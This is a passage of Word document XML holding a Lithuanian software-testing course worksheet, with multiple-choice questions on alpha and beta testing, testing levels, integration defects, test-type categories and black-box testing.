              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Testuotojai</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2223" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Verslo atstovai / galutiniai vartotojai</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BB3322" w:rsidRPr="00AD4464" w:rsidRDefault="00BB3322" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kaip vadinama testavimo veikla, kai testavimas atliekamas gamintojo organizacijoje, tačiau</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba ne</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>priklausomos testavimo komandos,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> arba potencialių klientų?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Beta testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Regresinis testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Alfa testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nepriklausomas (Objektyvus) test</w:t>
      </w:r>
      <w:r w:rsidR="004E350E" w:rsidRPr="00AD4464">
        <w:t>avi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="004E350E" w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra Beta testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo veikla, atliekama testuotojų gamintojo organizacijoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo veikla, atliekama užsakovo, gamintojo aplinkoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo veikla atliekama potencialių klientų jų patalpose/vietoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AF7B14" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimo veikla, organizuojama nepriklausomos orgamizacijos su tikslu priimti pagamintą IS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ką testuojame sistemos lygmenyje?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programas /sistemas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos reikalavimus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos sąsajas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Verslo procesus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokios yra tipinės integracinio lygmens klaidos?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Skaičiavimų klaidos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Duomenų srautų klaidos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Duomenų surišimo klaidos (data mapping)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD63D4" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Logikos klaidos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001121E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuo remiamės atlikdami</w:t>
      </w:r>
      <w:r w:rsidR="00356BCC" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> testavimą component lygmenyje</w:t>
      </w:r>
      <w:r w:rsidR="00727BF6" w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00356BCC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sąsajų specifikacijomis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00356BCC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rizikos vertinimo ataskaitomis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00356BCC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sistemos reikalavimais</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00356BCC" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programos kodu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C28AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> TESTŲ TIPAI</w:t>
      </w:r>
      <w:r w:rsidR="00D4668B" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007019C1" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Smoke, regression testavimas</w:t>
      </w:r>
      <w:r w:rsidR="00511545">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001121E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>nas klausimas gali turėti vieną arba daugiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005811B8" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t>: Mokėti testavimo tipus. Gebė</w:t>
      </w:r>
      <w:r w:rsidR="00C53794" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ti atskirti skirtingus testavimo tipus; suprasti, kokie testavimo metodai būdingi kiekvienam testavimo tipui. Skirti bazinių testų ir regresijos sąvokas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00160761" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Žemiau pateiktus testavimo tipus suskirstykite į atitinkamas kategorijas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00160761" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Komponentų testavimas, Našumo testavimas, Priėmimo testavimas, Apkrovos testavimas, Saugumo testavimas, Palaikymo testavimas, </w:t>
      </w:r>
      <w:r w:rsidR="001869FD" w:rsidRPr="00AD4464">
        <w:t>Prieinamumo testavimas, Lokalizavimo testavimas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001869FD" w:rsidRPr="00AD4464" w:rsidRDefault="001869FD" w:rsidP="00372B3A">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285"/>
        <w:gridCol w:w="3285"/>
      </w:tblGrid>
      <w:tr w:rsidR="001869FD" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3284" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Funkcinis testavi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1869FD" w:rsidRPr="00AD4464" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nefunkcinis testavi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1869FD" w:rsidRPr="00AD4464" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Palaikymo testaviam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1869FD" w:rsidRPr="00AD4464" w:rsidRDefault="001869FD" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001121E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ką vadiname juodos dėžės te</w:t>
      </w:r>
      <w:r w:rsidR="00155635" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">stavimu? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programos testavimas kai žinome programos kodą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programos testavimas kai nežinome programos kodo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t>, kuris yra paremtas vid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ine struktūros analize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
